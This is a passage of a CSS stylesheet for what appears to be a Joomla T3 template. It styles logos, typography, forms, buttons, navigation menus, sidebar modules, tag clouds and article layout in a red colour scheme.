  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #cc0000;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #800000;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: left;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #cc0000;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: left;
}
.text-right {
  text-align: right;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-left: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-left: 0;
  list-style: none;
}
.list-inline {
  padding-left: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-left: 5px;
  padding-right: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-left: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: left;
    width: 160px;
    clear: left;
    text-align: right;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-left: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    display: table;
    content: " ";
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-left: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-right: 15px;
  padding-left: 0;
  border-right: 5px solid #eeeeee;
  border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: right;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:focus,
.btn-inverse.focus {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #000000;
}
.btn-inverse:hover {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  background-image: none;
  border-color: #191919;
}
.btn-inverse:active:hover,
.btn-inverse.active:hover,
.open > .dropdown-toggle.btn-inverse:hover,
.btn-inverse:active:focus,
.btn-inverse.active:focus,
.open > .dropdown-toggle.btn-inverse:focus,
.btn-inverse:active.focus,
.btn-inverse.active.focus,
.open > .dropdown-toggle.btn-inverse.focus {
  color: #ffffff;
  background-color: #191919;
  border-color: #000000;
}
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-left: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-left: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-left-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-left-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #cc0000;
  border-bottom-color: #cc0000;
}
.nav a:hover .caret {
  border-top-color: #800000;
  border-bottom-color: #800000;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-left: 0;
  padding-right: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  display: table;
  content: " ";
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: left;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
}
@media screen and (min-width: 768px) {
  .counter {
    float: right;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  right: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #cc0000;
  border-color: #b30000;
}
.navbar-default .navbar-text {
  color: #ffcccc;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-left: 30px;
  }
}
.navbar-default .navbar-nav > li > a,
.navbar-default .navbar-nav > li > span {
  color: #ffcccc;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a,
  .navbar-default .navbar-nav > li > span {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > span:hover,
.navbar-default .navbar-nav > li > a:focus,
.navbar-default .navbar-nav > li > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > span:hover,
  .navbar-default .navbar-nav > li > a:focus,
  .navbar-default .navbar-nav > li > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > span,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > span:hover,
.navbar-default .navbar-nav > .active > a:focus,
.navbar-default .navbar-nav > .active > span:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > span,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > span:hover,
  .navbar-default .navbar-nav > .active > a:focus,
  .navbar-default .navbar-nav > .active > span:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #b30000;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #ffcccc;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #b30000;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #ffcccc;
  border-bottom-color: #ffcccc;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #b30000;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #990000;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffcccc;
    padding: 20px 20px 20px 30px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #990000;
    border-top: 1px solid #800000;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #800000;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-left: 40px;
  }
}
.navbar-default .navbar-link {
  color: #ffcccc;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #b30000;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-left: 0;
  padding-right: 0;
  float: left;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -20px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-right: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #b30000;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  left: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  right: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  display: table;
  content: " ";
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-left: 20px;
  padding-left: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-left: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-left: 0;
  margin-left: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #b30000;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    left: auto;
    right: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form .input-group-addon {
  align-items: center;
  display: flex;
  width: auto;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
#login-form button[class*=plg_system_webauthn_login_button] {
  align-items: center;
  color: #000;
  display: flex;
  max-height: unset;
  gap: 4px;
  width: 100%;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: right;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-right: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-left: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0;
}
.module-ct .whosonline {
  margin-left: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 5px 5px 0;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: left;
  margin: 0 5px 5px 0;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #cc0000;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 5px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #800000;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #800000;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-right: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #cc0000;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-left: 0;
}
.newsflash img {
  width: 100%;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.article-header {
  display: flex;
  align-items: flex-start;
}
.article-header .label {
  border-radius: 3px;
  display: inline-block;
  line-height: 1;
  padding: 4px 6px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-left: 0;
  margin-right: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-right: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #cc0000;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #800000;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align="left"],
.article-intro img[align="left"],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="left"],
  .article-intro img[align="left"],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0 0 20px;
  }
}
article img[align="right"],
.article-intro img[align="right"],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="right"],
  .article-intro img[align="right"],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0 0 20px;
  }
}
article .pull-none.item-image img,
.article-intro .pull-none.item-image img {
  width: 100%;
}
